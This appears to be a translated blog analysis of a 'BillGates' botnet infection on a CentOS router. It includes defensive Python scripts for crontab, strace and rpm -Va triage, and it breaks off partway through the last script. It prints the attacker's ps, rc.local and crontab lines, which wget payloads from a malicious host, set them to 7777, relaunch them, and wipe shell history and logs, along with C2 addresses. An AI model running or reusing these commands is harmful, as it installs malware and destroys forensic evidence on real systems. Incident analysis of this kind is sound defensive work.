
The Linux botnet malware "BillGates"


I thought this analysis was well done, so I decided to translate it and hope to exchange ideas with everyone.

Please credit the source when reposting: http://blog.csdn.net/u010484477     Thanks

Keywords: malware, linux, information security

In yesterday's log I mentioned that my home router, an x86 box running CentOS, was behaving strangely, as if it were loading the CPU on its own. So I decided to get in and see what was going on, and I immediately realized that someone had gotten into the server: there were processes hanging around pulling files from dgnfd564sdf.com, mainly atddd, cupsdd, cupsddh, ksapdd, kysapdd, skysapdd, xfsdxd and so on.

root      4741  0.0  0.0  41576  2264 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/sksapd
root      4753  0.0  0.0  41576  2268 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx
root      4756  0.0  0.0  41576  2264 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd
root      4757  0.0  0.0  41576  2268 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/kysapd
root      4760  0.0  0.0  41576  2264 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/ksapd
root      4764  0.0  0.0  41576  2268 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/atdd
root      4767  0.0  0.0  41576  2264 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/skysapd
Startup analysis

At first I felt my way around, trying to figure out what had actually compromised my machine. The first thing I thought of was to check /etc/rc.local. It contained:

cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd
Hmm, I thought, let's start with root's crontab, like this:
# crontab -e
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
*/1 * * * * killall -9 nfsd4
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
*/1 * * * * killall -9 profild.key
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
…
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg 
*/1 * * * * cd /var/log > auth.log 
*/1 * * * * cd /var/log > alternatives.log 
*/1 * * * * cd /var/log > boot.log 
*/1 * * * * cd /var/log > btmp 
*/1 * * * * cd /var/log > cron 
…
…
*/1 * * * * cd /var/log > cups 
*/1 * * * * cd /var/log > daemon.log 
*/1 * * * * cd /var/log > dpkg.log 
*/1 * * * * cd /var/log > faillog 
*/1 * * * * cd /var/log > kern.log 
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog 
*/1 * * * * cd /var/log > user.log 
*/1 * * * * cd /var/log > Xorg.x.log 
*/1 * * * * cd /var/log > anaconda.log 
*/1 * * * * cd /var/log > yum.log 
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp 
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
…
# Edit this file to introduce tasks to be run by cron.
#
# Edit this file to introduce tasks to be run by cron.
# Edit this file to introduce tasks to be run by cron.
Oh, and it is 183 KB, 4036 lines. Have you ever seen a 183 KB crontab? Well, that is what I was looking at. Strip away the endlessly repeated comment header and the jobs do four things: re-download the droppers into /etc, kill competing bots and stale copies with killall -9, mark the payloads 7777 and relaunch them under nohup, and try to wipe shell history and the files in /var/log.
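The crontab above is the piece a responder has to read in a hurry, so here is an added triage script (my example, not code from the original post or from the malware) that runs entries of the kinds shown above through a small set of indicator regexes, reports how often each job really fires, and demonstrates one quirk of the anti-forensics jobs. Two caveats it encodes: in Vixie/cronie cron a step larger than the field, such as */99 or */120 in the minute column, matches only minute 0, so those jobs run once an hour rather than never; and the log-wiping lines of the form cd /var/log > secure redirect the output of cd, so the shell creates an empty file named secure in cron's working directory (root's home) and the real /var/log/secure is left intact. The sample crontab and the throwaway log directory are constructed for the example.

```python
"""Triage a root crontab for the persistence and anti-forensics patterns in the dump above."""
import os
import re
import subprocess
import tempfile

# Constructed sample: a few entries copied from the crontab above, one benign
# job, and two of the comment lines cron itself writes.
SAMPLE_CRONTAB = """\
# Edit this file to introduce tasks to be run by cron.
#
*/1 * * * * killall -9 nfsd4
*/99 * * * * killall -9 kysapd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/360 * * * * cd /etc;rm -rf dir atdd
*/1 * * * * chmod 7777 /etc/atdd
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * cd /var/log > secure
*/1 * * * * history -c
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
"""

# Indicator name -> regex applied to the command part of an entry.
INDICATORS = {
    "kill-competitors": re.compile(r"\bkillall\b.*-9\b"),
    "download-into-etc": re.compile(r"\bcd /etc\b.*\b(wget|curl)\b"),
    "setuid-chmod": re.compile(r"\bchmod\s+[0-7]?[4-7][0-7]{3}\s+/etc/"),
    "relaunch-from-etc": re.compile(r"\bnohup\s+/etc/\S+"),
    "profile-tamper": re.compile(r">>\s*/etc/profile\b"),
    "history-wipe": re.compile(r"\.bash_history\b|\bhistory\s+-[cr]\b"),
    "log-truncate": re.compile(r"\bcd /var/log\s*>"),
}

CRON_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")


def effective_minutes(field, lo=0, hi=59):
    """Expand a minute field the way Vixie/cronie cron does: a step larger than
    the range (*/99, */120, ...) matches only the range start, i.e. minute 0."""
    base, _, step = field.partition("/")
    step = int(step) if step else 1
    if base == "*":
        start, end = lo, hi
    elif "-" in base:
        start, end = (int(x) for x in base.split("-"))
    else:
        start = end = int(base)
    return list(range(start, end + 1, step))


def triage_crontab(text):
    """Return (line_no, runs_per_hour, [indicator names], command) for flagged entries."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        minute_field, command = m.group(1), m.group(6)
        hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
        if hits:
            findings.append((no, len(effective_minutes(minute_field)), hits, command))
    return findings


def redirect_target(log_dir, home_dir):
    """Run `cd LOG_DIR > secure` the way cron would, with HOME_DIR as the working
    directory. The shell opens the redirection target before cd runs, so the
    empty file appears in HOME_DIR and LOG_DIR/secure keeps its contents.
    Returns (bytes still in LOG_DIR/secure, whether HOME_DIR/secure now exists)."""
    subprocess.run(["sh", "-c", "cd %s > secure" % log_dir], cwd=home_dir, check=True)
    return (os.path.getsize(os.path.join(log_dir, "secure")),
            os.path.exists(os.path.join(home_dir, "secure")))


def demo_redirect():
    """Stand-ins for /var/log and /root, created in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        log_dir, home_dir = os.path.join(tmp, "log"), os.path.join(tmp, "home")
        os.makedirs(log_dir)
        os.makedirs(home_dir)
        with open(os.path.join(log_dir, "secure"), "w") as f:
            f.write("Jan  1 21:00:00 host sshd[1]: Accepted password for root\n")
        return redirect_target(log_dir, home_dir)


if __name__ == "__main__":
    for no, runs, hits, cmd in triage_crontab(SAMPLE_CRONTAB):
        print("line %2d  %2d runs/hour  %-35s  %s" % (no, runs, ",".join(hits), cmd))
    print("bytes left in log/secure, home/secure created:", demo_redirect())
```

Run it as python3 triage.py; on a live box replace SAMPLE_CRONTAB with the output of crontab -l -u root, and check /var/spool/cron and /etc/cron.d as well, since rpm and rc.local tell you nothing about those.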

By the time I got onto the server these processes were no longer doing anything (no CPU, no network use). They had apparently decided to stop, let the machine recover, and not leave these telltale symptoms running so as to avoid being noticed. strace on them looked like this:
# strace -p 3312
Process 3312 attached - interrupt to quit
[ Process PID=3312 runs in 32 bit mode. ]
restart_syscall(<... resuming interrupted call ...>) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, 


# strace -p 3268
Process 3268 attached - interrupt to quit
[ Process PID=3268 runs in 32 bit mode. ]
recv(3, 0xfff19338, 4, 0)               = -1 ECONNRESET (Connection reset by peer)
close(3)                                = 0
futex(0x816e8a8, FUTEX_WAKE, 1)         = 1
futex(0x816e8a4, FUTEX_WAKE, 1)         = 1
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = 401
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, ^C <unfinished ...>
Process 3268 detached
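To get the C2 indicators out of traces like the two above without reading them by hand, here is an added Python parser (my example, not part of the original post) that pulls the connect() targets, the outcome of the first send() on each connection, the socket timeouts, the retry sleep, and the visible beacon fields out of strace output. The field layout it reports is only what the capture shows: a leading 'R', a 0x0d byte, a run of zeros, then the kernel release string; nothing beyond that is assumed about the protocol. Because strace notes the process runs in 32-bit mode, the SO_SNDTIMEO and SO_RCVTIMEO values are decoded as a struct timeval of two 32-bit ints, which gives a 15-second send timeout and a 60-second receive timeout to go with the 15-second nanosleep between attempts. The sample lines are copied from the traces above.

```python
"""Extract C2 endpoints, beacon fields and timing from strace output like the captures above."""
import re
import struct

# Constructed sample: lines copied from the two strace sessions above.
SAMPLE_STRACE = r'''
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, NULL)                = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress)
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = 401
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 27, 0) = 27
'''

CONNECT = re.compile(r'connect\(\d+, \{sa_family=AF_INET, sin_port=htons\((\d+)\), '
                     r'sin_addr=inet_addr\("([\d.]+)"\)\}')
SEND = re.compile(r'send\(\d+, "((?:[^"\\]|\\.)*)"(\.\.\.)?, (\d+), \d+\) = (-?\d+)(?: (\w+))?')
TIMEOUT = re.compile(r'setsockopt\(\d+, SOL_SOCKET, (SO_SNDTIMEO|SO_RCVTIMEO), "((?:[^"\\]|\\.)*)", 8\)')
SLEEP = re.compile(r'nanosleep\(\{(\d+), (\d+)\}')


def unescape(s):
    """Turn strace's C-style escapes (\\r, \\0, \\17, ...) back into raw bytes."""
    return s.encode("latin-1").decode("unicode_escape").encode("latin-1")


def parse_beacon(payload, declared_len):
    """Report only what the capture shows: byte 0 is 'R', byte 1 is 0x0d, then a
    run of zeros, then the kernel release string. Nothing else about the
    protocol is assumed here."""
    body = payload[2:]
    os_offset = 2 + (len(body) - len(body.lstrip(b"\0")))
    return {
        "magic": payload[:1].decode("latin-1"),
        "second_byte": payload[1],
        "os_offset": os_offset,
        "os": payload[os_offset:].split(b"\0")[0].decode("latin-1"),
        "declared_len": declared_len,       # strace printed only a prefix of the 401 bytes
        "captured_len": len(payload),
    }


def summarize(trace):
    """Endpoints with the result of their first send(), timeouts, retry sleep, beacon fields."""
    report = {"endpoints": [], "timeouts": {}, "retry_sleep": None, "beacon": None}
    for line in trace.splitlines():
        m = CONNECT.search(line)
        if m:
            report["endpoints"].append({"ip": m.group(2), "port": int(m.group(1)),
                                        "status": "connecting"})
            continue
        m = SEND.search(line)
        if m:
            payload, declared = unescape(m.group(1)), int(m.group(3))
            result, errno = m.group(4), m.group(5)
            if report["beacon"] is None:
                report["beacon"] = parse_beacon(payload, declared)
            if report["endpoints"] and report["endpoints"][-1]["status"] == "connecting":
                report["endpoints"][-1]["status"] = errno or "sent %s bytes" % result
            continue
        m = TIMEOUT.search(line)
        if m:
            # 32-bit process: the option value is struct timeval as two
            # little-endian 32-bit ints, tv_sec then tv_usec.
            secs, _usec = struct.unpack("<ii", unescape(m.group(2))[:8])
            report["timeouts"][m.group(1)] = secs
            continue
        m = SLEEP.search(line)
        if m:
            report["retry_sleep"] = int(m.group(1))
    return report


if __name__ == "__main__":
    r = summarize(SAMPLE_STRACE)
    for e in r["endpoints"]:
        print("%s:%d  %s" % (e["ip"], e["port"], e["status"]))
    print("beacon:", r["beacon"])
    print("timeouts:", r["timeouts"], "retry sleep:", r["retry_sleep"])
```

Feed it a file captured with strace -f -s 512 -p PID -o trace.txt; a larger -s value keeps more of each send() so the beacon is not cut off after the kernel string the way it is above.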
From the trace it looks like they do almost nothing, just an occasional check-in to collect data. Of course they also modified /etc/rc.local and the crontab, and the executables (they all have the SUID bit set, which lets them do whatever they want; but then why did they neither delete nor change anything?), and they only touched /etc/profile:
unset MAILCHECK

That means the botnet had been on the machine for about 7 hours (the cron job appends unset MAILCHECK to /etc/profile once a minute, so the number of copies of that line gives the dwell time in minutes). Maybe it was actually a bit less, but not by much.

Now I need to check whether any system files were modified. On CentOS it is enough to run:

rpm -Va
I was pleased that the command printed exactly what I expected:
# rpm -Va
S.5....T.  c /etc/ppp/chap-secrets
S.5....T.  c /etc/issue
S.5....T.  c /etc/crontab
S.5....T.  c /etc/nagiosgraph/access.conf
S.5....T.  c /etc/nagiosgraph/nagiosgraph.conf
.M.......    /usr/lib/nagiosgraph/cgi-bin/show.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showconfig.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgraph.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgroup.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showhost.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showservice.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/testcolor.cgi
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.css
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.js
S.5....T.    /var/log/nagiosgraph/nagiosgraph-cgi.log
S.5....T.    /var/log/nagiosgraph/nagiosgraph.log
missing     /usr/java/jre1.7.0_40/lib/install.jar
....L....    /lib/modules/2.6.32-358.2.1.el6.x86_64/build
S.5....T.  c /etc/tor/torrc
.M.......    /
.......T.  c /etc/ppp/options.pptpd
S.5....T.  c /etc/pptpd.conf
....L....  c /etc/pam.d/fingerprint-auth
....L....  c /etc/pam.d/password-auth
....L....  c /etc/pam.d/smartcard-auth
....L....  c /etc/pam.d/system-auth
S.5....T.  c /etc/rsyslog.conf
S.5....T.  c /etc/rc.d/rc.local
..5....T.  c /etc/sysctl.conf
S.5....T.  c /etc/vsftpd/vsftpd.conf
.M.......    /var/ftp/pub
..5....T.  c /etc/sysconfig/PlexMediaServer
.......T.    /usr/lib/plexmediaserver/start.sh
S.5....T.  c /etc/sysconfig/lm_sensors
S.5....T.  c /etc/php.ini
S.5....T.  c /etc/httpd/conf/httpd.conf
.......T.    /etc/rc.d/init.d/deluge-daemon
S.5....T.  c /etc/cacti/db.php
S.5....T.  c /etc/cron.d/cacti
S.5....T.  c /etc/httpd/conf.d/cacti.conf
.M.......    /usr/share/cacti
.M.......    /usr/share/cacti/about.php
.M.......    /usr/share/cacti/auth_changepassword.php
.M.......    /usr/share/cacti/auth_login.php
.M.......    /usr/share/cacti/cdef.php
.M.......    /usr/share/cacti/cmd.php
.M.......    /usr/share/cacti/color.php
.M.......    /usr/share/cacti/data_input.php
.M.......    /usr/share/cacti/data_queries.php
.M.......    /usr/share/cacti/data_sources.php
.M.......    /usr/share/cacti/data_templates.php
.M.......    /usr/share/cacti/gprint_presets.php
.M.......    /usr/share/cacti/graph.php
.M.......    /usr/share/cacti/graph_image.php
.M.......    /usr/share/cacti/graph_settings.php
.M.......    /usr/share/cacti/graph_templates.php
.M.......    /usr/share/cacti/graph_templates_inputs.php
.M.......    /usr/share/cacti/graph_templates_items.php
.M.......    /usr/share/cacti/graph_view.php
.M.......    /usr/share/cacti/graph_xport.php
.M.......    /usr/share/cacti/graphs.php
.M.......    /usr/share/cacti/graphs_items.php
.M.......    /usr/share/cacti/graphs_new.php
.M.......    /usr/share/cacti/host.php
.M.......    /usr/share/cacti/host_templates.php
.M.......    /usr/share/cacti/images
.M.......    /usr/share/cacti/images/arrow.gif
.M.......    /usr/share/cacti/images/auth_deny.gif
.M.......    /usr/share/cacti/images/auth_login.gif
.M.......    /usr/share/cacti/images/auth_logout.gif
.M.......    /usr/share/cacti/images/button_add.gif
.M.......    /usr/share/cacti/images/button_cancel.gif
.M.......    /usr/share/cacti/images/button_cancel2.gif
.M.......    /usr/share/cacti/images/button_clear.gif
.M.......    /usr/share/cacti/images/button_colapse_all.gif
.M.......    /usr/share/cacti/images/button_create.gif
.M.......    /usr/share/cacti/images/button_default.gif
.M.......    /usr/share/cacti/images/button_delete.gif
.M.......    /usr/share/cacti/images/button_expand_all.gif
.M.......    /usr/share/cacti/images/button_export.gif
.M.......    /usr/share/cacti/images/button_go.gif
.M.......    /usr/share/cacti/images/button_help.gif
.M.......    /usr/share/cacti/images/button_import.gif
.M.......    /usr/share/cacti/images/button_no.gif
.M.......    /usr/share/cacti/images/button_purge.gif
.M.......    /usr/share/cacti/images/button_refresh.gif
.M.......    /usr/share/cacti/images/button_save.gif
.M.......    /usr/share/cacti/images/button_view.gif
.M.......    /usr/share/cacti/images/button_yes.gif
.M.......    /usr/share/cacti/images/cacti_about_logo.gif
.M.......    /usr/share/cacti/images/cacti_backdrop.gif
.M.......    /usr/share/cacti/images/cacti_backdrop2.gif
.M.......    /usr/share/cacti/images/cacti_logo.gif
.M.......    /usr/share/cacti/images/calendar.gif
.M.......    /usr/share/cacti/images/delete_icon.gif
.M.......    /usr/share/cacti/images/delete_icon_large.gif
.M.......    /usr/share/cacti/images/disable_icon.png
.M.......    /usr/share/cacti/images/enable_icon.png
.M.......    /usr/share/cacti/images/enable_icon_disabled.png
.M.......    /usr/share/cacti/images/favicon.ico
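Reading rpm -Va output by eye across a few hundred lines is error-prone, so here is an added Python helper (my example, not from the original post) that decodes the nine verification flags, separates config files from package payload, and ranks entries: anything that is a startup or persistence point (/etc/crontab, rc.local, /etc/profile, /etc/pam.d, /etc/cron.*, rsyslog.conf) or a non-config file whose digest changed goes first, missing files and mode/ownership drift next, ordinary config edits last. Two limits to keep in mind: rpm -Va only checks files that belong to a package, so the droppers placed in /etc and root's crontab under /var/spool/cron never show up in it, and on a box where the attacker had root the rpm database and the rpm binary themselves are not trustworthy, so this is a first cut to be confirmed from rescue media or with rpm -Vp against packages from a clean mirror. The sample lines are a subset of the output above.

```python
"""Rank `rpm -Va` output: which differences matter on a host with a known intrusion."""
import re

# Constructed sample: a subset of the lines above.
SAMPLE_RPM_VA = """\
S.5....T.  c /etc/crontab
.M.......    /usr/lib/nagiosgraph/cgi-bin/show.cgi
missing     /usr/java/jre1.7.0_40/lib/install.jar
....L....  c /etc/pam.d/system-auth
S.5....T.  c /etc/rsyslog.conf
S.5....T.  c /etc/rc.d/rc.local
..5....T.  c /etc/sysctl.conf
S.5....T.  c /etc/httpd/conf/httpd.conf
.M.......    /
"""

# rpm's nine verification columns, left to right.
FLAG_NAMES = {"S": "size", "M": "mode", "5": "digest", "D": "device", "L": "symlink",
              "U": "user", "G": "group", "T": "mtime", "P": "capabilities"}

# Package-owned files that double as startup or persistence points.
PERSISTENCE_PATHS = {"/etc/crontab", "/etc/rc.d/rc.local", "/etc/rc.local", "/etc/profile",
                     "/etc/bashrc", "/etc/ld.so.preload", "/etc/rsyslog.conf"}
PERSISTENCE_PREFIXES = ("/etc/cron.", "/etc/pam.d/", "/etc/rc.d/", "/etc/init.d/", "/etc/profile.d/")

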